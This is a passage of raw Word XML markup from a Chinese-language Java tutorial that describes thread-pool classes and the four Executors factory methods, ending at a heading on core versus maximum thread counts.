              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>真正的线程池接口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847415" w:rsidRPr="00847415" w:rsidTr="00847415">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ScheduledExecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6004" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>能和</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Timer/TimerTask</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>类似，解决那些需要任务重复执行的问题。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847415" w:rsidRPr="00847415" w:rsidTr="00847415">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ThreadPoolExecutor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6004" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ExecutorService</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>的默认实现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847415" w:rsidRPr="00847415" w:rsidTr="00847415">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ScheduledThreadPoolExecutor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6004" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="outset" w:sz="6" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>继承</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ThreadPoolExecutor</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ScheduledExecutorService</w:t>
            </w:r>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口实现，周期性任务调度的类实现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要配置一个线程池是比较复杂的，尤其是对于线程池的原理不是很清楚的情况下，很有可能配置的线程池不是较优的，因此在</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Executors</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类里面提供了一些静态工厂，生成一些常用的线程池。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1. newSingleThreadExecutor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建一个单线程的线程池。这个线程池只有一个线程在工作，也就是相当于单线程串行执行所有任务。如果这个唯一的线程因为异常结束，那么会有一个新的线程来替代它。此线程池保证所有任务的执行顺序按照任务的提交顺序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>newFixedThreadPool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建固定大小的线程池。每次提交一个任务就创建一个线程，直到线程达到线程池的最大大小。线程池的大小一旦达到最大值就会保持不变，如果某个线程因为执行异常而结束，那么线程池会补充一个新线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>3. newCachedThreadPool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建一个可缓存的线程池。如果线程池的大小超过了处理任务所需要的线程，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那么就会回收部分空闲（</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒不执行任务）的线程，当任务数增加时，此线程池又可以智能的添加新线程来处理任务。此线程池不会对线程池大小做限制，线程池大小完全依赖于操作系统（或者说</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）能够创建的最大线程大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>newScheduledThreadPool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00F41A4C" w:rsidRDefault="00847415" w:rsidP="00CF2198">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建一个大小无限的线程池。此线程池支持定时以及周期性执行任务的需求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF2198" w:rsidRPr="00F41A4C" w:rsidRDefault="00CF2198" w:rsidP="00CF2198">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD7C9A" w:rsidRPr="00F41A4C" w:rsidRDefault="00AE4DEF" w:rsidP="00BD7C9A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.5.2</w:t>
      </w:r>
      <w:r w:rsidR="00BD7C9A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>核心线程数和最大线程数区别</w:t>
      </w:r>
      <w:r w:rsidR="00BD7C9A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5239" w:rsidRPr="000335A0" w:rsidRDefault="004C21D5" w:rsidP="000335A0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="236" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
